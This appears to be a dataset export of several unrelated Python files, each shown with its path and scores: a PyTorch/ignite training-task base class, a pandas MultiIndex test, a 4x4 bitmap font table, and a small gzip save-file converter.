lambda it: '{}: {}'.format(it[0], repr(it[1]).replace('\n', ' ')),
_engine.state.metrics.items(),
))))
@evaluator.on(engine.Events.COMPLETED)
def store_model(_engine: engine.Engine):
if 'compare_metric' not in context:
context['compare_metric'] = float('-inf')
if 'compare_by' not in profile or len(profile.compare_by) == 0:
compare_by = 'loss'
sign = '-'
else:
compare_by = profile.compare_by
if compare_by[0] in '+-':
sign = compare_by[0]
compare_by = compare_by[1:]
else:
sign = '+'
if compare_by not in _engine.state.metrics:
logger.warning(f'Not found "{compare_by}" in metrics. Fall back to loss.')
compare_by = 'loss'
sign = '-'
metric_value = _engine.state.metrics[compare_by]
if sign == '-':
metric_value = -metric_value
if metric_value > context['compare_metric']:
context['compare_metric'] = metric_value
shared[self._model_key] = deepcopy(model.eval())
logger.info(f'Stored the model with {compare_by} of {metric_value}.')
@trainer.on(engine.Events.ITERATION_COMPLETED(
every=int(len(train_loader) * (profile.loss_display if 'loss_display' in profile else 0.1))
))
def display_loss(_engine: engine.Engine):
epoch_iteration = _engine.state.iteration % _engine.state.epoch_length
if epoch_iteration == 0:
epoch_iteration = _engine.state.epoch_length
logger.info('TRAIN EPOCH {} ITERATION {} | output: {}'.format(
_engine.state.epoch, epoch_iteration, _engine.state.output
))
@trainer.on(engine.Events.EPOCH_COMPLETED)
def evaluate(_engine: engine.Engine):
evaluator.run(
validate_loader,
)
self.register_handlers(profile, shared, logger, model, trainer, evaluator, context)
trainer.run(
train_loader,
max_epochs=profile.max_epochs if 'max_epochs' in profile else 100,
)
return Return.SUCCESS
@property
def _model_key(self):
return 'model' if self.prefix is None else f'{self.prefix}_model'
def require(self) -> List[Text]:
"""
The task requires 2 items, including "train_loader" and "validate_loader.
Returns:
"train_loader" and "validate_loader"
"""
return [
'train_loader',
'validate_loader',
]
def provide(self) -> List[Text]:
"""
The task provides 1 item, including "model" or "\\<something\\>_model".
Returns:
"model" or "\\<something\\>_model"
"""
return [
self._model_key
]
def remove(self) -> List[Text]:
"""
This task removes nothing.
Returns:
nothing
"""
return []
@classmethod
def define(cls) -> List[Definition]:
"""
Define the schema of `TrainTask`.
Returns:
Schema of `TrainTask`.
Examples:
See Also [Train AlexNet on Place 365 dataset](https://github.com/chenrz925/waterch-tasker/blob/master/examples/place365_alexnet.toml)
"""
return [
value('model', list, [
value('reference', str),
value('kwargs', list, [])
]),
value('loss_function', list, [
value('reference', str),
value('kwargs', list, [])
]),
value('metrics', list, []),
value('optimizer', list, [
value('reference', str),
value('kwargs', list, []),
value('scheduler', list, [
value('reference', str),
value('kwargs', list)
])
])
]
@abstractmethod
def create_model(self, profile: Profile, shared: Storage, logger: Logger, **kwargs) -> nn.Module:
"""
Implement `create_model` to build the PyTorch model.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
Always return [SUCCESS][tasker.typedef.Return.SUCCESS].
Notes:
The profile should be attribute "model" in the task profile.
"""
raise NotImplementedError('Please create the model in create_model')
@abstractmethod
def create_loss_function(self, profile: Profile, shared: Storage, logger: Logger, **kwargs) -> nn.Module:
"""
Implement `create_loss_function` to build the PyTorch loss function.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
Always return [SUCCESS][tasker.typedef.Return.SUCCESS].
Notes:
The profile should be attribute "loss_function" in the task profile.
"""
raise NotImplementedError('Please create the loss function in create_loss_function')
@abstractmethod
def create_optimizer(self, profile: Profile, shared: Storage, logger: Logger, model: nn.Module,
**kwargs) -> optim.Optimizer:
"""
Implement `create_optimizer` to build the PyTorch optimizer.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
Always return [SUCCESS][tasker.typedef.Return.SUCCESS].
Notes:
The profile should be attribute "optimizer" in the task profile.
"""
raise NotImplementedError('Please create the optimizer in create_optimizer')
def prepare_train_batch(
self, profile: Profile, shared: Storage, logger: Logger,
batch: Tuple[torch.Tensor], device: Text, non_blocking: bool = False
):
"""
Preparing batch of samples when training. Implement this function to
customize.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
batch: Raw batch provided by the data loader.
device: Which device of the batch.
non_blocking: Whether the action of moving the batch is blocking.
Returns:
Prepared batch.
"""
x, y = batch
return (
convert_tensor(x, device=torch.device(device), non_blocking=non_blocking),
convert_tensor(y, device=torch.device(device), non_blocking=non_blocking),
)
def prepare_validate_batch(
self, profile: Profile, shared: Storage, logger: Logger,
batch: Tuple[torch.Tensor], device: Text, non_blocking: bool = False
):
"""
Preparing batch of samples when validating. Implement this function to
customize.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
batch: Raw batch provided by the data loader.
device: Which device of the batch.
non_blocking: Whether the action of moving the batch is blocking.
Returns:
Prepared batch.
"""
x, y = batch
return (
convert_tensor(x, device=torch.device(device), non_blocking=non_blocking),
convert_tensor(y, device=torch.device(device), non_blocking=non_blocking),
)
def create_trainer(
self, profile: Profile, shared: Storage, logger: Logger,
model: nn.Module, loss_function: nn.Module, optimizer: optim.Optimizer, lr_scheduler: Any,
output_transform=lambda x, y, y_pred, loss: loss.item(),
**kwargs
) -> engine.Engine:
"""
Build the trainer engine. Re-implement this function when you
want to customize the updating actions of training.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
model: The model to train.
loss_function: The loss function to train.
optimizer: The optimizer to train.
lr_scheduler: The scheduler to control the learning rate.
output_transform: The action to transform the output of the model.
Returns:
The trainer engine.
"""
if 'device' in profile:
device_type = profile.device
else:
device_type = 'cpu'
if 'non_blocking' in profile:
non_blocking = profile.non_blocking
else:
non_blocking = False
if 'deterministic' in profile:
deterministic = profile.deterministic
else:
deterministic = False
def _update(_engine: engine.Engine, _batch: Tuple[torch.Tensor]):
model.train()
optimizer.zero_grad()
x, y = self.prepare_train_batch(profile, shared, logger, _batch, device=device_type,
non_blocking=non_blocking)
y_pred = model(x)
loss = loss_function(y_pred, y)
loss.backward()
optimizer.step()
if lr_scheduler is not None:
lr_scheduler.step(loss)
return output_transform(x, y, y_pred, loss)
trainer = engine.Engine(_update) if not deterministic else engine.DeterministicEngine(_update)
return trainer
def register_metrics(
self, profile: Profile, shared: Storage, logger: Logger,
_metrics: Dict
):
"""
Register the metric methods.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
_metrics: The metrics dictionary to register.
Returns:
The metrics dictionary.
"""
return _metrics
def register_handlers(self, profile, shared, logger, model, trainer, evaluator, context):
"""
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
model: The model to train.
trainer: The trainer of the model.
evaluator: The evaluator of the model.
context: The context dictionary to store states in handlers.
Returns:
Nothing.
"""
pass
def create_evaluator(
self, profile: Profile, shared: Storage, logger: Logger,
model: nn.Module, loss_function: nn.Module, optimizer: optim.Optimizer, lr_scheduler: Any,
output_transform=lambda x, y, y_pred: (y_pred, y),
**kwargs
) -> engine.Engine:
"""
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
model: The model to train.
loss_function: The loss function to train.
optimizer: The optimizer to train.
lr_scheduler: The scheduler to control the learning rate.
output_transform: The action to transform the output of the model.
Returns:
The evaluator engine.
"""
if 'device' in profile:
device_type = profile.device
else:
device_type = 'cpu'
if 'non_blocking' in profile:
non_blocking = profile.non_blocking
else:
non_blocking = False
if 'deterministic' in profile:
deterministic = profile.deterministic
else:
deterministic = False
_metrics = {}
self.register_metrics(profile, shared, logger, _metrics)
def _inference(_engine: engine.Engine, _batch: Tuple[torch.Tensor]):
model.eval()
with torch.no_grad():
x, y = self.prepare_validate_batch(profile, shared, logger, _batch, device=device_type,
non_blocking=non_blocking)
y_pred = model(x)
return output_transform(x, y, y_pred)
evaluator = engine.DeterministicEngine(_inference) if deterministic else engine.Engine(_inference)
for name, metric in _metrics.items():
metric.attach(evaluator, name)
return evaluator
class SimpleTrainTask(TrainTask):
"""
<i>tasker.contrib.torch.SimpleTrainTask</i>
An easy to use base class of task for training model. You can
create model only with reference of dataset and related profile.
Examples:
See Also [Train AlexNet on Place 365 dataset](https://github.com/chenrz925/waterch-tasker/blob/master/examples/place365_alexnet.toml)
"""
def create_model(self, profile: Profile, shared: Storage, logger: Logger, **kwargs) -> nn.Module:
"""
You can build the model class implementing [`Module`](https://pytorch.org/docs/stable/generated/torch.nn.Module.html#torch.nn.Module).
And the parameters of the model class can be passed by `kwargs`.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
New model instance.
"""
if 'reference' in profile:
clz = profile.reference
try:
if not issubclass(clz, nn.Module):
logger.warning('Referenced class is not a subclass of torch.nn.Module.')
except TypeError:
logger.warning('Referenced object is not a class, maybe a function?')
else:
raise RuntimeError('Missing field "reference" in the model profile.')
if 'kwargs' in profile:
kwargs = profile.kwargs
else:
kwargs = {}
model = clz(**kwargs)
return model
def create_loss_function(self, profile: Profile, shared: Storage, logger: Logger, **kwargs) -> nn.Module:
"""
You can build the loss function class implementing [`Module`](https://pytorch.org/docs/stable/generated/torch.nn.Module.html#torch.nn.Module).
And the parameters of the model class can be passed by `kwargs`.
All loss functions provided PyTorch officially can be referenced.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
New model instance.
"""
if 'reference' in profile:
clz = profile.reference
try:
if not issubclass(clz, nn.Module):
logger.warning('Referenced class is not a subclass of torch.nn.Module.')
except TypeError:
logger.warning('Referenced object is not a class, maybe a function?')
else:
raise RuntimeError('Missing field "reference" in the loss_function profile.')
if 'kwargs' in profile:
kwargs = profile.kwargs
else:
kwargs = {}
loss_function = clz(**kwargs)
return loss_function
def create_optimizer(self, profile: Profile, shared: Storage, logger: Logger, model: nn.Module, **kwargs) -> Tuple[
optim.Optimizer, Any]:
"""
You can build the optimizer class implementing [`Optimizer`](https://pytorch.org/docs/stable/optim.html#torch.optim.Optimizer).
And the parameters of the optimizer class can be passed by `kwargs`.
All optimizers provided PyTorch officially can be referenced.
You can also build a learning rate scheduler through `lr_scheduler` field.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
model: The model to train.
Returns:
New optimizer instance.
"""
if 'reference' in profile:
clz = profile.reference
try:
if not issubclass(clz, optim.Optimizer):
logger.warning('Referenced class is not a subclass of torch.optim.Optimizer.')
except TypeError:
logger.warning('Referenced object is not a class, maybe a function?')
else:
raise RuntimeError('Missing field "reference" in the optimizer profile.')
if 'kwargs' in profile:
kwargs = profile.kwargs
else:
kwargs = {}
optimizer = clz(model.parameters(), **kwargs)
if 'lr_scheduler' in profile:
if 'reference' in profile.lr_scheduler:
lr_scheduler_clz = profile.lr_scheduler.reference
if 'kwargs' in profile.lr_scheduler:
lr_scheduler_kwargs = profile.lr_scheduler.kwargs
else:
lr_scheduler_kwargs = {}
lr_scheduler = lr_scheduler_clz(optimizer, **lr_scheduler_kwargs)
else:
lr_scheduler = None
else:
lr_scheduler = None
return optimizer, lr_scheduler
def register_metrics(
self, profile: Profile, shared: Storage, logger: Logger,
_metrics: Dict
):
"""
Register the metric methods. In `SimpleTrainTask`,
all the metrics can be initialized in profile by
"M" type field.
Examples:
Register accuracy as metric method.
```toml
accuracy = '$M$ignite.metrics.Accuracy'
```
Register F1 macro as metric method.
```toml
f1macro = '1$M$tasker.contrib.torch.FBetaMacro$I'
```
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
_metrics: The metrics dictionary to register.
Returns:
The metrics dictionary.
"""
_metrics['loss'] = metrics.Loss(self.create_loss_function(profile.loss_function, shared, logger))
if 'metrics' in profile:
_metrics.update(profile.metrics)
return _metrics | 0.828904 | 0.539347 |
import numpy as np
import pytest
from pandas import MultiIndex
import pandas._testing as tm
def test_numeric_compat(idx):
with pytest.raises(TypeError, match="cannot perform __mul__"):
idx * 1
with pytest.raises(TypeError, match="cannot perform __rmul__"):
1 * idx
div_err = "cannot perform __truediv__"
with pytest.raises(TypeError, match=div_err):
idx / 1
div_err = div_err.replace(" __", " __r")
with pytest.raises(TypeError, match=div_err):
1 / idx
with pytest.raises(TypeError, match="cannot perform __floordiv__"):
idx // 1
with pytest.raises(TypeError, match="cannot perform __rfloordiv__"):
1 // idx
@pytest.mark.parametrize("method", ["all", "any"])
def test_logical_compat(idx, method):
msg = f"cannot perform {method}"
with pytest.raises(TypeError, match=msg):
getattr(idx, method)()
def test_inplace_mutation_resets_values():
levels = [["a", "b", "c"], [4]]
levels2 = [[1, 2, 3], ["a"]]
codes = [[0, 1, 0, 2, 2, 0], [0, 0, 0, 0, 0, 0]]
mi1 = MultiIndex(levels=levels, codes=codes)
mi2 = MultiIndex(levels=levels2, codes=codes)
# instantiating MultiIndex should not access/cache _.values
assert "_values" not in mi1._cache
assert "_values" not in mi2._cache
vals = mi1.values.copy()
vals2 = mi2.values.copy()
# accessing .values should cache ._values
assert mi1._values is mi1._cache["_values"]
assert mi1.values is mi1._cache["_values"]
assert isinstance(mi1._cache["_values"], np.ndarray)
# Make sure level setting works
new_vals = mi1.set_levels(levels2).values
tm.assert_almost_equal(vals2, new_vals)
# Non-inplace doesn't drop _values from _cache [implementation detail]
tm.assert_almost_equal(mi1._cache["_values"], vals)
# ...and values is still same too
tm.assert_almost_equal(mi1.values, vals)
# Inplace should drop _values from _cache
with tm.assert_produces_warning(FutureWarning):
mi1.set_levels(levels2, inplace=True)
assert "_values" not in mi1._cache
tm.assert_almost_equal(mi1.values, vals2)
# Make sure label setting works too
codes2 = [[0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]]
exp_values = np.empty((6,), dtype=object)
exp_values[:] = [(1, "a")] * 6
# Must be 1d array of tuples
assert exp_values.shape == (6,)
new_mi = mi2.set_codes(codes2)
assert "_values" not in new_mi._cache
new_values = new_mi.values
assert "_values" in new_mi._cache
# Not inplace shouldn't change
tm.assert_almost_equal(mi2._cache["_values"], vals2)
# Should have correct values
tm.assert_almost_equal(exp_values, new_values)
# ...and again setting inplace should drop _values from _cache, etc
with tm.assert_produces_warning(FutureWarning):
mi2.set_codes(codes2, inplace=True)
assert "_values" not in mi2._cache
tm.assert_almost_equal(mi2.values, new_values)
assert "_values" in mi2._cache
def test_pickle_compat_construction():
# this is testing for pickle compat
# need an object to create with
with pytest.raises(TypeError, match="Must pass both levels and codes"):
MultiIndex() | venv/Lib/site-packages/pandas/tests/indexes/multi/test_compat.py | import numpy as np
import pytest
from pandas import MultiIndex
import pandas._testing as tm
def test_numeric_compat(idx):
with pytest.raises(TypeError, match="cannot perform __mul__"):
idx * 1
with pytest.raises(TypeError, match="cannot perform __rmul__"):
1 * idx
div_err = "cannot perform __truediv__"
with pytest.raises(TypeError, match=div_err):
idx / 1
div_err = div_err.replace(" __", " __r")
with pytest.raises(TypeError, match=div_err):
1 / idx
with pytest.raises(TypeError, match="cannot perform __floordiv__"):
idx // 1
with pytest.raises(TypeError, match="cannot perform __rfloordiv__"):
1 // idx
@pytest.mark.parametrize("method", ["all", "any"])
def test_logical_compat(idx, method):
msg = f"cannot perform {method}"
with pytest.raises(TypeError, match=msg):
getattr(idx, method)()
def test_inplace_mutation_resets_values():
levels = [["a", "b", "c"], [4]]
levels2 = [[1, 2, 3], ["a"]]
codes = [[0, 1, 0, 2, 2, 0], [0, 0, 0, 0, 0, 0]]
mi1 = MultiIndex(levels=levels, codes=codes)
mi2 = MultiIndex(levels=levels2, codes=codes)
# instantiating MultiIndex should not access/cache _.values
assert "_values" not in mi1._cache
assert "_values" not in mi2._cache
vals = mi1.values.copy()
vals2 = mi2.values.copy()
# accessing .values should cache ._values
assert mi1._values is mi1._cache["_values"]
assert mi1.values is mi1._cache["_values"]
assert isinstance(mi1._cache["_values"], np.ndarray)
# Make sure level setting works
new_vals = mi1.set_levels(levels2).values
tm.assert_almost_equal(vals2, new_vals)
# Non-inplace doesn't drop _values from _cache [implementation detail]
tm.assert_almost_equal(mi1._cache["_values"], vals)
# ...and values is still same too
tm.assert_almost_equal(mi1.values, vals)
# Inplace should drop _values from _cache
with tm.assert_produces_warning(FutureWarning):
mi1.set_levels(levels2, inplace=True)
assert "_values" not in mi1._cache
tm.assert_almost_equal(mi1.values, vals2)
# Make sure label setting works too
codes2 = [[0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]]
exp_values = np.empty((6,), dtype=object)
exp_values[:] = [(1, "a")] * 6
# Must be 1d array of tuples
assert exp_values.shape == (6,)
new_mi = mi2.set_codes(codes2)
assert "_values" not in new_mi._cache
new_values = new_mi.values
assert "_values" in new_mi._cache
# Not inplace shouldn't change
tm.assert_almost_equal(mi2._cache["_values"], vals2)
# Should have correct values
tm.assert_almost_equal(exp_values, new_values)
# ...and again setting inplace should drop _values from _cache, etc
with tm.assert_produces_warning(FutureWarning):
mi2.set_codes(codes2, inplace=True)
assert "_values" not in mi2._cache
tm.assert_almost_equal(mi2.values, new_values)
assert "_values" in mi2._cache
def test_pickle_compat_construction():
# this is testing for pickle compat
# need an object to create with
with pytest.raises(TypeError, match="Must pass both levels and codes"):
MultiIndex() | 0.512205 | 0.662783 |
chars = [
[
"0000",
"0000",
"0000",
"0000"
],
[
"0100",
"0100",
"0000",
"0100"
],
[
"1010",
"1010",
"0000",
"0000"
],
[
"1010",
"1111",
"1010",
"1111"
],
[
"1110",
"1100",
"0110",
"1110"
],
[
"1001",
"0010",
"0100",
"1001"
],
[
"0110",
"0110",
"1010",
"1111"
],
[
"0100",
"0100",
"0000",
"0000"
],
[
"0010",
"0100",
"0100",
"0010"
],
[
"0100",
"0010",
"0010",
"0100"
],
[
"1010",
"0100",
"1010",
"0000"
],
[
"0000",
"0100",
"1110",
"0100"
],
[
"0000",
"0000",
"0010",
"0100"
],
[
"0000",
"0000",
"1110",
"0000"
],
[
"0000",
"0000",
"0000",
"0100"
],
[
"0001",
"0010",
"0100",
"1000"
],
[
"0110",
"1010",
"1010",
"1100"
],
[
"0010",
"0110",
"0010",
"0010"
],
[
"0110",
"0001",
"0110",
"0111"
],
[
"1100",
"0110",
"0010",
"1100"
],
[
"1010",
"1110",
"0010",
"0010"
],
[
"1110",
"1000",
"0110",
"1110"
],
[
"0100",
"0111",
"0101",
"0011"
],
[
"1100",
"0010",
"0010",
"0010"
],
[
"1110",
"1010",
"1110",
"1110"
],
[
"1100",
"1010",
"0110",
"0010"
],
[
"0100",
"0000",
"0100",
"0000"
],
[
"0100",
"0000",
"0100",
"1000"
],
[
"0000",
"0010",
"0100",
"0010"
],
[
"0000",
"1110",
"0000",
"1110"
],
[
"0000",
"0100",
"0010",
"0100"
],
[
"1110",
"0010",
"0110",
"0100"
],
[
"0110",
"1001",
"1010",
"0111"
],
[
"0100",
"1010",
"1110",
"1010"
],
[
"0110",
"0111",
"0101",
"0110"
],
[
"0011",
"0100",
"0100",
"0011"
],
[
"0110",
"0101",
"0101",
"0110"
],
[
"0011",
"0110",
"0100",
"0111"
],
[
"0111",
"0100",
"0110",
"0100"
],
[
"0111",
"0100",
"0101",
"0111"
],
[
"1010",
"1010",
"1110",
"1010"
],
[
"1110",
"0100",
"0100",
"1110"
],
[
"0010",
"0010",
"1010",
"1110"
],
[
"0101",
"0110",
"0110",
"0101"
],
[
"0100",
"0100",
"0100",
"0111"
],
[
"1001",
"1111",
"1001",
"1001"
],
[
"1110",
"1010",
"1010",
"1010"
],
[
"0110",
"1001",
"1001",
"0110"
],
[
"0110",
"0101",
"0110",
"0100"
],
[
"0100",
"1010",
"1010",
"0111"
],
[
"0110",
"0101",
"0110",
"0101"
],
[
"0110",
"1100",
"0110",
"1100"
],
[
"1110",
"0100",
"0100",
"0100"
],
[
"1010",
"1010",
"1010",
"0110"
],
[
"1010",
"1010",
"1110",
"0100"
],
[
"1001",
"1001",
"1111",
"0110"
],
[
"1010",
"1010",
"0100",
"1010"
],
[
"1010",
"1010",
"0100",
"0100"
],
[
"1111",
"0010",
"0100",
"1111"
],
[
"0110",
"0100",
"0100",
"0110"
],
[
"1000",
"0100",
"0010",
"0001"
],
[
"0110",
"0010",
"0010",
"0110"
],
[
"0100",
"1010",
"0000",
"0000"
],
[
"0000",
"0000",
"0000",
"1111"
],
[
"0100",
"0010",
"0000",
"0000"
],
[
"0000",
"0110",
"1010",
"0110"
],
[
"0100",
"0110",
"0101",
"0110"
],
[
"0000",
"0110",
"1000",
"0110"
],
[
"0010",
"0110",
"1010",
"0110"
],
[
"0110",
"1010",
"1100",
"0110"
],
[
"0010",
"0100",
"0110",
"0100"
],
[
"0110",
"1000",
"1010",
"0110"
],
[
"0100",
"0100",
"0111",
"0101"
],
[
"0100",
"0000",
"0100",
"0100"
],
[
"0010",
"0010",
"1010",
"0100"
],
[
"0100",
"0101",
"0110",
"0101"
],
[
"0100",
"0100",
"0100",
"0010"
],
[
"1000",
"1111",
"1011",
"1011"
],
[
"0000",
"1100",
"1010",
"1010"
],
[
"0000",
"0100",
"1010",
"0100"
],
[
"0010",
"0101",
"0110",
"0100"
],
[
"0100",
"1010",
"0110",
"0011"
],
[
"0100",
"0110",
"0100",
"0100"
],
[
"0000",
"0110",
"0100",
"1100"
],
[
"0100",
"1110",
"0100",
"0100"
],
[
"0000",
"1010",
"1010",
"0110"
],
[
"0000",
"1010",
"1110",
"0100"
],
[
"0000",
"1011",
"1011",
"0110"
],
[
"0000",
"1010",
"0100",
"1010"
],
[
"0000",
"1010",
"0100",
"0100"
],
[
"0000",
"1100",
"0100",
"0110"
],
[
"0110",
"0100",
"1100",
"0110"
],
[
"0010",
"0010",
"0010",
"0010"
],
[
"0110",
"0010",
"0011",
"0110"
],
[
"0000",
"0101",
"1010",
"0000"
],
] | font4x4.py | chars = [
[
"0000",
"0000",
"0000",
"0000"
],
[
"0100",
"0100",
"0000",
"0100"
],
[
"1010",
"1010",
"0000",
"0000"
],
[
"1010",
"1111",
"1010",
"1111"
],
[
"1110",
"1100",
"0110",
"1110"
],
[
"1001",
"0010",
"0100",
"1001"
],
[
"0110",
"0110",
"1010",
"1111"
],
[
"0100",
"0100",
"0000",
"0000"
],
[
"0010",
"0100",
"0100",
"0010"
],
[
"0100",
"0010",
"0010",
"0100"
],
[
"1010",
"0100",
"1010",
"0000"
],
[
"0000",
"0100",
"1110",
"0100"
],
[
"0000",
"0000",
"0010",
"0100"
],
[
"0000",
"0000",
"1110",
"0000"
],
[
"0000",
"0000",
"0000",
"0100"
],
[
"0001",
"0010",
"0100",
"1000"
],
[
"0110",
"1010",
"1010",
"1100"
],
[
"0010",
"0110",
"0010",
"0010"
],
[
"0110",
"0001",
"0110",
"0111"
],
[
"1100",
"0110",
"0010",
"1100"
],
[
"1010",
"1110",
"0010",
"0010"
],
[
"1110",
"1000",
"0110",
"1110"
],
[
"0100",
"0111",
"0101",
"0011"
],
[
"1100",
"0010",
"0010",
"0010"
],
[
"1110",
"1010",
"1110",
"1110"
],
[
"1100",
"1010",
"0110",
"0010"
],
[
"0100",
"0000",
"0100",
"0000"
],
[
"0100",
"0000",
"0100",
"1000"
],
[
"0000",
"0010",
"0100",
"0010"
],
[
"0000",
"1110",
"0000",
"1110"
],
[
"0000",
"0100",
"0010",
"0100"
],
[
"1110",
"0010",
"0110",
"0100"
],
[
"0110",
"1001",
"1010",
"0111"
],
[
"0100",
"1010",
"1110",
"1010"
],
[
"0110",
"0111",
"0101",
"0110"
],
[
"0011",
"0100",
"0100",
"0011"
],
[
"0110",
"0101",
"0101",
"0110"
],
[
"0011",
"0110",
"0100",
"0111"
],
[
"0111",
"0100",
"0110",
"0100"
],
[
"0111",
"0100",
"0101",
"0111"
],
[
"1010",
"1010",
"1110",
"1010"
],
[
"1110",
"0100",
"0100",
"1110"
],
[
"0010",
"0010",
"1010",
"1110"
],
[
"0101",
"0110",
"0110",
"0101"
],
[
"0100",
"0100",
"0100",
"0111"
],
[
"1001",
"1111",
"1001",
"1001"
],
[
"1110",
"1010",
"1010",
"1010"
],
[
"0110",
"1001",
"1001",
"0110"
],
[
"0110",
"0101",
"0110",
"0100"
],
[
"0100",
"1010",
"1010",
"0111"
],
[
"0110",
"0101",
"0110",
"0101"
],
[
"0110",
"1100",
"0110",
"1100"
],
[
"1110",
"0100",
"0100",
"0100"
],
[
"1010",
"1010",
"1010",
"0110"
],
[
"1010",
"1010",
"1110",
"0100"
],
[
"1001",
"1001",
"1111",
"0110"
],
[
"1010",
"1010",
"0100",
"1010"
],
[
"1010",
"1010",
"0100",
"0100"
],
[
"1111",
"0010",
"0100",
"1111"
],
[
"0110",
"0100",
"0100",
"0110"
],
[
"1000",
"0100",
"0010",
"0001"
],
[
"0110",
"0010",
"0010",
"0110"
],
[
"0100",
"1010",
"0000",
"0000"
],
[
"0000",
"0000",
"0000",
"1111"
],
[
"0100",
"0010",
"0000",
"0000"
],
[
"0000",
"0110",
"1010",
"0110"
],
[
"0100",
"0110",
"0101",
"0110"
],
[
"0000",
"0110",
"1000",
"0110"
],
[
"0010",
"0110",
"1010",
"0110"
],
[
"0110",
"1010",
"1100",
"0110"
],
[
"0010",
"0100",
"0110",
"0100"
],
[
"0110",
"1000",
"1010",
"0110"
],
[
"0100",
"0100",
"0111",
"0101"
],
[
"0100",
"0000",
"0100",
"0100"
],
[
"0010",
"0010",
"1010",
"0100"
],
[
"0100",
"0101",
"0110",
"0101"
],
[
"0100",
"0100",
"0100",
"0010"
],
[
"1000",
"1111",
"1011",
"1011"
],
[
"0000",
"1100",
"1010",
"1010"
],
[
"0000",
"0100",
"1010",
"0100"
],
[
"0010",
"0101",
"0110",
"0100"
],
[
"0100",
"1010",
"0110",
"0011"
],
[
"0100",
"0110",
"0100",
"0100"
],
[
"0000",
"0110",
"0100",
"1100"
],
[
"0100",
"1110",
"0100",
"0100"
],
[
"0000",
"1010",
"1010",
"0110"
],
[
"0000",
"1010",
"1110",
"0100"
],
[
"0000",
"1011",
"1011",
"0110"
],
[
"0000",
"1010",
"0100",
"1010"
],
[
"0000",
"1010",
"0100",
"0100"
],
[
"0000",
"1100",
"0100",
"0110"
],
[
"0110",
"0100",
"1100",
"0110"
],
[
"0010",
"0010",
"0010",
"0010"
],
[
"0110",
"0010",
"0011",
"0110"
],
[
"0000",
"0101",
"1010",
"0000"
],
] | 0.275812 | 0.391755 |
import gzip
import io
import json
import time
import sys
def decompress(inputBytes):
with io.BytesIO() as bio:
with io.BytesIO(inputBytes) as stream:
decompressor = gzip.GzipFile(fileobj=stream, mode='r')
while True: # until EOF
chunk = decompressor.read(8192)
if not chunk:
decompressor.close()
bio.seek(0)
return bio.read().decode("utf-8")
bio.write(chunk)
return None
def compress(inputString):
with io.BytesIO() as bio:
bio.write(inputString.encode("utf-8"))
bio.seek(0)
with io.BytesIO() as stream:
compressor = gzip.GzipFile(fileobj=stream, mode='w')
while True: # until EOF
chunk = bio.read(8192)
if not chunk: # EOF?
compressor.close()
return stream.getvalue()
compressor.write(chunk)
if __name__ == "__main__":
if len(sys.argv) >= 1:
fn = ' '.join(sys.argv[1:])
ext = fn.split('.')[-1]
try:
with open(fn, "rb") as ifstream:
if ext == 'json':
print(f'Compressing "{fn}"')
data = compress(ifstream.read().decode('utf-8'))
with open(".".join(fn.split(".")[:-1]) + ".gzip", "wb") as ofstream:
ofstream.write(data)
print('Done')
elif ext == 'gzip':
print(f'Decompressing "{fn}"')
data = decompress(ifstream.read())
with open(".".join(fn.split(".")[:-1]) + ".json", "w", encoding="utf-8") as ofstream:
ofstream.write(data)
print('Done')
else:
print(f'Unknown file type "{ext}"')
except:
print(f'Error opening file "{fn}"')
else:
print('Please drag and drop on save_gzipper.py" either a .json or .gzip file to compress/decompress it')
print('Closing this prompt in 10 seconds')
time.sleep(10)
with open("save.json", "r") as stream:
data = compressStringToBytes(stream.read())
with open("out.gzip", "wb") as stream:
stream.write(data) | tools/save_gzipper.py | import gzip
import io
import json
import time
import sys
def decompress(inputBytes):
with io.BytesIO() as bio:
with io.BytesIO(inputBytes) as stream:
decompressor = gzip.GzipFile(fileobj=stream, mode='r')
while True: # until EOF
chunk = decompressor.read(8192)
if not chunk:
decompressor.close()
bio.seek(0)
return bio.read().decode("utf-8")
bio.write(chunk)
return None
def compress(inputString):
with io.BytesIO() as bio:
bio.write(inputString.encode("utf-8"))
bio.seek(0)
with io.BytesIO() as stream:
compressor = gzip.GzipFile(fileobj=stream, mode='w')
while True: # until EOF
chunk = bio.read(8192)
if not chunk: # EOF?
compressor.close()
return stream.getvalue()
compressor.write(chunk)
if __name__ == "__main__":
if len(sys.argv) >= 1:
fn = ' '.join(sys.argv[1:])
ext = fn.split('.')[-1]
try:
with open(fn, "rb") as ifstream:
if ext == 'json':
print(f'Compressing "{fn}"')
data = compress(ifstream.read().decode('utf-8'))
with open(".".join(fn.split(".")[:-1]) + ".gzip", "wb") as ofstream:
ofstream.write(data)
print('Done')
elif ext == 'gzip':
print(f'Decompressing "{fn}"')
data = decompress(ifstream.read())
with open(".".join(fn.split(".")[:-1]) + ".json", "w", encoding="utf-8") as ofstream:
ofstream.write(data)
print('Done')
else:
print(f'Unknown file type "{ext}"')
except:
print(f'Error opening file "{fn}"')
else:
print('Please drag and drop on save_gzipper.py" either a .json or .gzip file to compress/decompress it')
print('Closing this prompt in 10 seconds')
time.sleep(10)
with open("save.json", "r") as stream:
data = compressStringToBytes(stream.read())
with open("out.gzip", "wb") as stream:
stream.write(data) | 0.144239 | 0.072112 |
import os
import re
